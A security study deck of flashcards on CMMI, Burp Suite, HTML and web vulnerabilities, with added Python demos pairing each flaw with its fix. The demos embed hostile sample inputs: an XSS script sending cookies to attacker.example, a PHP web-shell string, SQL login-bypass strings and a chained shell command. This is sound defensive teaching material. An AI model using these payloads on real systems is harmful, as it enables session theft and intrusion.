Phase 3 Flashcards
What does CMMI stand for?
Capability Maturity Model Integration
How many levels are there in CMMI?
5
At which level of CMMI are processes characterized throughout the organization?
Defined
Optimizing
Managed
Quantitatively Managed
Defined
PCI-DSS has how many objectives?
6
At which level of CMMI are processes unpredictable and/or poorly controlled?
Initial
Which of the following are the significant compliance drivers used to manage a GRC program effectively? (select all that apply)
Regulatory
Compliance
Contractual
Organizational
Regulatory
Contractual
Organizational
What is the default port used by Burp Suite for its proxy listener?
8080
When using Burp Suite as a proxy, what default IP address should the browser's proxy setting point to?
127.0.0.1 (localhost)
What additional step is necessary to intercept an HTTPS site through the proxy?
Burp's root CA certificate (the one it uses to sign the per-site TLS certificates it presents) must be installed in the browser's trusted CA store; otherwise the browser rejects the proxy's certificate.
In which section of an HTML document would the <title></title> tags normally be used?
The <head> section
Which of these is the anchor tag?
<img>
<div>
<anchor>
<a>
<a></a>
What is inline content?
When all the HTML, CSS and JavaScript for a page exist in one single file
What is linked content?
When a page's HTML references separate files containing the CSS and JavaScript
What type of vulnerability allows attackers to execute unauthorized commands on the server by exploiting improperly sanitized input fields?
Command injection
A vulnerability that allows an attacker to execute arbitrary commands on the host operating system through a vulnerable application, typically because user input is passed to a shell as part of a command line
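The card above in working code, as an added example that is not part of the flashcard deck: a hypothetical "greet" endpoint whose `name` field is attacker-controlled, built with `echo` so it is harmless to run offline. The payload, the allow-list regex and the function names are assumptions for the demo.

```python
import re
import subprocess

# Added example (not from the flashcards): a hypothetical "greet" endpoint
# where `name` is attacker-controlled. It runs `echo`, so it is harmless offline.


def greet_vulnerable(name: str) -> str:
    # Vulnerable: the input is spliced into a command string handed to /bin/sh,
    # so shell metacharacters (; | & $( ) `) are interpreted instead of echoed.
    cmd = f"echo Hello {name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def greet_argv(name: str) -> str:
    # Better: an argv list with shell=False. No shell parses the data, so the
    # whole payload reaches echo as one literal argument.
    return subprocess.run(["echo", "Hello", name], capture_output=True, text=True).stdout


NAME_RE = re.compile(r"[A-Za-z0-9 _.-]{1,64}")  # assumed allow-list for this field


def greet_hardened(name: str) -> str:
    # Hardened: allow-list validation on top of the argv form (defence in depth).
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"rejected input: {name!r}")
    return greet_argv(name)


def is_rejected(name: str) -> bool:
    """True if the hardened version refuses `name`."""
    try:
        greet_hardened(name)
    except ValueError:
        return True
    return False


PAYLOAD = "x; echo INJECTED"  # constructed attacker input


if __name__ == "__main__":
    print(repr(greet_vulnerable(PAYLOAD)))  # the second command ran
    print(repr(greet_argv(PAYLOAD)))        # payload printed back literally
    print(is_rejected(PAYLOAD), is_rejected("Alice"))
```

The argv form is the real fix; the allow-list is a second layer, and it is also what protects you when the called program itself treats some argument values specially (for example an argument starting with `-`).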
Which attack uses the user's currently authenticated session to forge a request to a web application?
Cross-site request forgery (CSRF) tricks the victim's browser into submitting a request the victim did not intend, relying on the browser attaching the session cookie automatically.
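A worked version of the CSRF card, added here and not part of the flashcard deck: a toy "transfer" endpoint that authorises on the session cookie alone, next to one that also demands a synchronizer token bound to the session with a keyed hash. The session store, the server secret and the request dictionaries are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Added example, not from the flashcards. The session store and request
# shapes are assumptions for the demo.

SERVER_SECRET = secrets.token_bytes(32)   # server-side key, never sent to clients
SESSIONS = {"s3ss10n-alice": "alice"}      # constructed: one logged-in user


def csrf_token_for(session_id: str) -> str:
    # Token derived from the session id with a keyed hash. An attacker's page
    # cannot compute it (no key) and cannot read it out of the victim's page
    # (same-origin policy), so it cannot be supplied in a forged request.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict) -> str:
    # Vulnerable: authorises purely on the session cookie, which the browser
    # attaches automatically to a form post from any site.
    if request["cookies"].get("session") not in SESSIONS:
        return "denied: not logged in"
    return f"sent {request['form']['amount']} to {request['form']['to']}"


def transfer_protected(request: dict) -> str:
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        return "denied: not logged in"
    token = request["form"].get("csrf_token", "")
    # compare_digest avoids leaking the token through comparison timing.
    if not hmac.compare_digest(token, csrf_token_for(sid)):
        return "denied: missing or invalid CSRF token"
    return f"sent {request['form']['amount']} to {request['form']['to']}"


def forged_request() -> dict:
    # Constructed: an auto-submitting form on evil.example, posted by the
    # victim's browser. The cookie rides along; the token does not, because
    # evil.example never saw the real page.
    return {"cookies": {"session": "s3ss10n-alice"},
            "form": {"amount": "1000", "to": "attacker"}}


def legitimate_request() -> dict:
    # Constructed: the real form, which embedded the token the server rendered.
    return {"cookies": {"session": "s3ss10n-alice"},
            "form": {"amount": "20", "to": "bob",
                     "csrf_token": csrf_token_for("s3ss10n-alice")}}


if __name__ == "__main__":
    print(transfer_vulnerable(forged_request()))
    print(transfer_protected(forged_request()))
    print(transfer_protected(legitimate_request()))
```

The token only works because the browser refuses to let evil.example read the bank's page; marking the session cookie `SameSite=Lax` or `Strict` is a complementary control that stops the cookie riding along in the first place.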
What vulnerability occurs when a web application allows the upload of executable scripts as files?
File upload and file inclusion vulnerabilities
These vulnerabilities allow attackers to upload dangerous files to a server, or to make the server include files it should not:
LFI: local file inclusion (a file already on the server, typically reached via path traversal)
RFI: remote file inclusion (a file fetched from an attacker-controlled URL)
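The two controls a practitioner wants for these cards, as an added example that is not from the flashcard deck: an upload validator that ignores the client's filename and checks both extension and magic bytes, and an include resolver that canonicalises the path and refuses anything outside the pages directory. The allowed-type table, the `pages` directory layout and the web root path are assumptions.

```python
import os
import re
import secrets
from typing import Optional

# Added example, not from the flashcards. The allowed types and the web root
# layout (web_root/pages/<name>) are assumptions for the demo.

# Allowed types by extension, with the magic bytes each must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
SERVER_NAME_RE = re.compile(r"[0-9a-f]{32}\.(png|jpg|gif)")


def validate_upload(client_filename: str, data: bytes):
    """Return (accepted, reason_or_stored_name). The client's name is never reused."""
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed"       # shell.php
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"   # shell.php.png with PHP inside
    # Server-chosen random name: no path traversal from "../", and no
    # attacker-chosen ".php." anywhere in the stored name for handlers to trip on.
    return True, f"{secrets.token_hex(16)}.{ext}"


def is_server_name(name: str) -> bool:
    return SERVER_NAME_RE.fullmatch(name) is not None


def resolve_include(web_root: str, page: str) -> Optional[str]:
    # Vulnerable pattern this replaces: include(web_root + "/pages/" + page)
    # with page = "../../etc/passwd" (LFI) or an absolute path.
    base = os.path.realpath(os.path.join(web_root, "pages"))
    # os.path.join discards `base` if `page` is absolute, so the check below
    # also catches "/etc/passwd".
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    print(validate_upload("shell.php", b"<?php system($_GET['c']); ?>"))
    print(validate_upload("cat.png", ALLOWED_TYPES["png"] + b"\x00" * 8))
    print(resolve_include("/var/www", "../../etc/passwd"))
    print(resolve_include("/var/www", "about"))
```

Even with a clean name and header, an uploaded file should be stored outside the document root (or served with no script handler and a fixed `Content-Type`), because an image with PHP appended still passes a magic-byte check. For includes, an allow-list of page names is simpler than path canonicalisation and is the better primary control; the realpath check is the fallback for when names must be dynamic. Neither function helps against RFI if the application ever passes a URL to `include`; the fix there is not to accept URLs at all.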
What vulnerability is present if an attacker can programmatically bypass a web application's CAPTCHA?
Insecure CAPTCHA: occurs when the CAPTCHA implementation is weak, allowing automated systems to bypass it and attack the function it was meant to protect
Which vulnerability allows attackers to manipulate backend databases through unsanitized input fields?
SQL injection: inserting SQL syntax via the input data sent from the client so that it becomes part of the query the application runs
What vulnerability could allow an attacker to predict or brute force a session token?
Weak session IDs: tokens that are short, sequential or derived from guessable values are vulnerable to prediction or interception, allowing attackers to hijack a user's session
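What "guessable" means in practice, as an added example that is not part of the flashcard deck: a deliberately weak session-id generator (hash of a login counter and a whole-second timestamp) next to a sound one, and the attacker's prediction loop. The generator design, the search-window sizes and the counter/time values are assumptions for the demo.

```python
import hashlib
import math
import secrets

# Added example, not from the flashcards: a deliberately weak session-id
# scheme next to a sound one, plus the attacker's prediction loop.


def weak_session_id(login_counter: int, issued_at: int) -> str:
    # Weak: the only inputs are a sequential login counter and a whole-second
    # timestamp, both of which an attacker can estimate. Hashing hides the
    # inputs but adds no entropy; the candidate set stays tiny.
    return hashlib.md5(f"{login_counter}:{issued_at}".encode()).hexdigest()


def strong_session_id() -> str:
    # Sound: 32 bytes (256 bits) from the OS CSPRNG, not derived from any state.
    return secrets.token_urlsafe(32)


def predict_weak(my_counter: int, my_time: int, target_id: str,
                 max_logins: int = 50, window_s: int = 300):
    """Attacker's view: they know the scheme, log in themselves to learn their
    own counter and time, and guess the victim logged in within the next
    `max_logins` logins and `window_s` seconds."""
    for counter in range(my_counter + 1, my_counter + 1 + max_logins):
        for t in range(my_time, my_time + window_s + 1):
            if weak_session_id(counter, t) == target_id:
                return counter, t
    return None


def search_space_bits(max_logins: int = 50, window_s: int = 300) -> float:
    # log2 of the number of candidates the attacker must try in the weak scheme.
    # Compare with 256 bits for strong_session_id().
    return math.log2(max_logins * (window_s + 1))


if __name__ == "__main__":
    T = 1_700_000_000                      # constructed login time
    victim = weak_session_id(1001, T + 37)  # victim logged in 37 s after the attacker
    print(predict_weak(1000, T, victim))    # attacker recovers (1001, T + 37)
    print(f"weak search space: {search_space_bits():.1f} bits vs 256 bits")
    print(strong_session_id())
```

The weak scheme falls to under 2^14 candidates with generous guesses; the token does not even need to be intercepted. Compare session ids with `hmac.compare_digest` as well, so the lookup itself does not leak which prefix bytes matched.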
What type of vulnerability allows attackers to inject client-side scripts into web pages viewed by other users?
Cross-site scripting (XSS) allows attackers to inject malicious scripts into content viewed by other users. Stored XSS persists on the server (for example in a comment), while reflected XSS is echoed back in the response to a crafted request.
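Both flavours of the XSS card rendered with and without output encoding, as an added example that is not part of the flashcard deck: a toy comment board (stored) and a search box (reflected). It also shows why escaping only `<`, `>` and `&` is not enough inside an attribute value. The comment store, templates and payloads are constructed for the demo.

```python
import html

# Added example, not from the flashcards: a toy comment board (stored XSS)
# and search page (reflected XSS), rendered with and without output encoding.

COMMENTS = []   # constructed server-side store


def post_comment(text: str) -> None:
    COMMENTS.append(text)   # stored as-is; the bug (if any) is at render time


def render_comments_vulnerable() -> str:
    # Vulnerable: raw user text concatenated into HTML. A stored <script>
    # runs in the browser of every later visitor.
    return "".join(f"<p>{c}</p>" for c in COMMENTS)


def render_comments_safe() -> str:
    # Hardened: encode for the HTML text context at output time.
    return "".join(f"<p>{html.escape(c)}</p>" for c in COMMENTS)


def render_search_vulnerable(q: str) -> str:
    # Reflected: the query parameter is echoed into an attribute value.
    return f'<input name="q" value="{q}">'


def render_search_half_fixed(q: str) -> str:
    # Escaping only < > & is not enough inside a quoted attribute: a double
    # quote still closes the value and lets the attacker add attributes.
    return f'<input name="q" value="{html.escape(q, quote=False)}">'


def render_search_safe(q: str) -> str:
    # quote=True (the default) also encodes " and ', which this context needs.
    return f'<input name="q" value="{html.escape(q, quote=True)}">'


# Constructed payloads.
STORED_PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


if __name__ == "__main__":
    post_comment("hello")
    post_comment(STORED_PAYLOAD)
    print(render_comments_vulnerable())
    print(render_comments_safe())
    print(render_search_half_fixed(ATTR_PAYLOAD))
    print(render_search_safe(ATTR_PAYLOAD))
```

The rule the example illustrates is that encoding is context-specific: text nodes, attribute values, URLs and inline JavaScript each need their own encoder, which is why a template engine that auto-escapes per context beats hand-placed `escape()` calls.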
What are the 6 phases of the software development life cycle (SDLC)?
Planning
Analysis
Design
Implementation
Testing and integration
Maintenance
Where is the default Apache configuration file in Fedora Linux?
/etc/httpd/conf/httpd.conf (the configuration directory is /etc/httpd/conf)
Why should the 404 page be customized?
To avoid disclosing details about the Apache server (the default error page shows the server version and OS), reducing the information an attacker can use to choose version-specific known attacks
What is Java?
A compiled (to JVM bytecode), statically typed language used to develop a wide variety of applications, including desktop software, mobile apps and web servers
What is JavaScript?
An interpreted, dynamically typed language primarily used to add interactivity to web pages
What is Metadata?
Data about the data or object
What designates JavaScript in an HTML document?
The <script></script> tags
What is a race condition?
An attack where the attacker races a vulnerable application by exploiting the gap between the time it checks a resource (for example a file's type or permissions) and the time it uses it. Also known as TOCTOU (time-of-check to time-of-use).
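The file-based TOCTOU race from the card, made deterministic so it can be run, as an added example that is not part of the flashcard deck: a reader that checks the path and then opens it, with the attacker's swap (replace the checked file with a symlink to a secret) injected into the gap through a hook, next to a reader that opens with `O_NOFOLLOW` and checks the descriptor it actually holds. The temporary files and the hook are constructed for the demo; in a real attack the secret is something only the privileged program can read.

```python
import os
import stat
import tempfile

# Added example, not from the flashcards. The attacker's swap is simulated
# deterministically via a hook that runs inside the check-to-use gap.


def read_vulnerable(path: str, in_the_gap=None) -> str:
    # Time of check: "is it a regular, non-symlink file?"
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("refused at check time")
    if in_the_gap:
        in_the_gap()              # the race window: the attacker acts here
    # Time of use: open() follows whatever `path` points at *now*.
    with open(path) as f:
        return f.read()


def read_safe(path: str, in_the_gap=None) -> str:
    if in_the_gap:
        in_the_gap()              # same swap; it no longer matters
    # One operation: refuse to follow a symlink at open time, then check the
    # handle we actually hold (fstat on the fd) rather than the name.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "r") as f:
        if not stat.S_ISREG(os.fstat(f.fileno()).st_mode):
            raise PermissionError("not a regular file")
        return f.read()


def run_demo():
    """Returns (what the vulnerable reader leaked, what the safe reader did)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")   # constructed: the target
        public = os.path.join(d, "public.txt")   # constructed: what gets checked
        with open(secret, "w") as f:
            f.write("SECRET")
        with open(public, "w") as f:
            f.write("public")

        def swap():
            # Attacker: replace the checked file with a symlink to the secret.
            os.remove(public)
            os.symlink(secret, public)

        leaked = read_vulnerable(public, in_the_gap=swap)

        # Reset and run the hardened reader against the same swap.
        os.remove(public)
        with open(public, "w") as f:
            f.write("public")
        try:
            outcome = read_safe(public, in_the_gap=swap)
        except OSError as e:     # ELOOP: "Too many levels of symbolic links"
            outcome = "refused: " + type(e).__name__
        return leaked, outcome


if __name__ == "__main__":
    print(run_demo())
```

`O_NOFOLLOW` only protects the final path component; if an attacker can swap a directory earlier in the path, the remaining fix is to hold a descriptor to a trusted directory and use `openat`-style calls relative to it, so that no lookup is repeated by name.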
How many directories deep does mkdir -p $(python3 -c 'print("A/"*50)') create?
50 (Python prints A/A/A/... fifty times, and mkdir -p creates each nested level)
In the command mkdir -p $(python3 -c 'print("A/"*50)'), what does the -p do?
Creates parent directories as needed (and does not error if a directory already exists)
Which SQL command allows us to query a database for current values?
SELECT
Which SQL command returns all the values in a table named people?
SELECT * FROM people;
Which SQL command allows new records to be created in a table called people?
INSERT INTO people (username, firstname, lastname, pass) VALUES ('uname', 'some', 'one', 'password1!');
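The SELECT and INSERT cards above and the SQL injection card earlier, worked together as one added example that is not part of the flashcard deck: the `people` table from the cards in an in-memory SQLite database, a login query built by string formatting next to the parameterised form, and the two classic payloads against each. The table contents, the second user and the payloads are constructed; the plaintext `pass` column copies the flashcard (a real application stores a password hash).

```python
import sqlite3

# Added example, not from the flashcards: the people table from the cards in
# an in-memory SQLite database, with string-built and parameterised logins.
# Storing a plaintext `pass` column copies the card; real apps store a hash.


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE people (username TEXT, firstname TEXT, lastname TEXT, pass TEXT)")
    # Parameterised INSERT: the values travel separately from the SQL text,
    # so a quote inside a value can never end the string literal.
    db.execute("INSERT INTO people (username, firstname, lastname, pass) VALUES (?, ?, ?, ?)",
               ("uname", "some", "one", "password1!"))
    db.execute("INSERT INTO people (username, firstname, lastname, pass) VALUES (?, ?, ?, ?)",
               ("admin", "site", "admin", "hunter2"))   # constructed second row
    return db


DB = make_db()


def list_people():
    return DB.execute("SELECT * FROM people").fetchall()


def login_vulnerable(username: str, password: str) -> bool:
    # Vulnerable: user input becomes part of the SQL text itself.
    sql = f"SELECT username FROM people WHERE username = '{username}' AND pass = '{password}'"
    return DB.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    # Hardened: placeholders; the driver sends the values as data, not syntax.
    sql = "SELECT username FROM people WHERE username = ? AND pass = ?"
    return DB.execute(sql, (username, password)).fetchone() is not None


# Constructed payloads.
COMMENT_PAYLOAD = "admin' --"        # closes the literal, comments out the password check
TAUTOLOGY_PAYLOAD = "' OR '1'='1"    # makes the WHERE clause always true


if __name__ == "__main__":
    print(list_people())
    print(login_vulnerable(COMMENT_PAYLOAD, "anything"))   # True: logged in as admin
    print(login_vulnerable("x", TAUTOLOGY_PAYLOAD))        # True: any row matches
    print(login_safe(COMMENT_PAYLOAD, "anything"))         # False
    print(login_safe("uname", "password1!"))               # True
```

With the comment payload the vulnerable query becomes `... WHERE username = 'admin' --' AND pass = 'anything'`, and everything after `--` is a comment; with the tautology as the password, `AND` binds tighter than `OR`, so the clause reduces to `(...) OR '1'='1'`. Parameterisation removes both because the payload is only ever compared as a string value.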
Where does PHP scripting run?
Server side
Why would a programmer choose a compiled language instead of an interpreted one?
Compiled code tends to be faster and more efficient
Using xxd on a file, you get the following output. What type of file is this?
00000000: 2321 2f62 696e 2f62 6173 680a            #!/bin/bash.
Bash script (the bytes decode to the shebang line #!/bin/bash followed by a newline)
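How to do the card's identification mechanically, as an added example that is not part of the flashcard deck: a parser for xxd's output format that recovers the raw bytes, and a small magic-byte classifier that recognises a shebang line and a handful of common headers. The magic table is a deliberately short assumed subset, and the second sample dump (an ELF header) is constructed.

```python
import re

# Added example, not from the flashcards: recover bytes from xxd output and
# identify the file by its leading bytes. The magic table is an assumed subset.

# "offset:" then hex groups of 2-4 digits separated by single spaces; the
# ASCII column that follows is separated by two spaces, so it is not matched.
XXD_LINE = re.compile(r"^([0-9A-Fa-f]+):((?: [0-9A-Fa-f]{2,4})+)")


def parse_xxd(dump: str) -> bytes:
    out = bytearray()
    for line in dump.splitlines():
        m = XXD_LINE.match(line.strip())
        if not m:
            continue                      # blank or non-xxd line
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)


MAGIC = [
    (b"\x7fELF", "ELF executable"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"%PDF", "PDF document"),
    (b"PK\x03\x04", "ZIP archive (also docx/jar/apk)"),
    (b"\x1f\x8b", "gzip data"),
    (b"MZ", "DOS/Windows PE executable"),
]


def identify(data: bytes) -> str:
    if data.startswith(b"#!"):
        # Shebang: the interpreter path runs to the end of the first line.
        interp = data[2:].split(b"\n", 1)[0].strip().decode(errors="replace")
        return f"script for {interp}"
    for magic, desc in MAGIC:
        if data.startswith(magic):
            return desc
    return "unknown"


# The dump from the card, and a constructed ELF header for comparison.
SCRIPT_DUMP = "00000000: 2321 2f62 696e 2f62 6173 680a            #!/bin/bash."
ELF_DUMP = "00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............"


if __name__ == "__main__":
    for dump in (SCRIPT_DUMP, ELF_DUMP):
        data = parse_xxd(dump)
        print(data, "->", identify(data))
```

Magic bytes identify what a file claims to be, not what is safe: the upload check in a web application should combine this with a server-chosen filename and a non-executable storage location, and `file(1)` uses a much larger table than the one here.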
What does the -m32 flag do with gcc?
Compiles the code into a 32-bit binary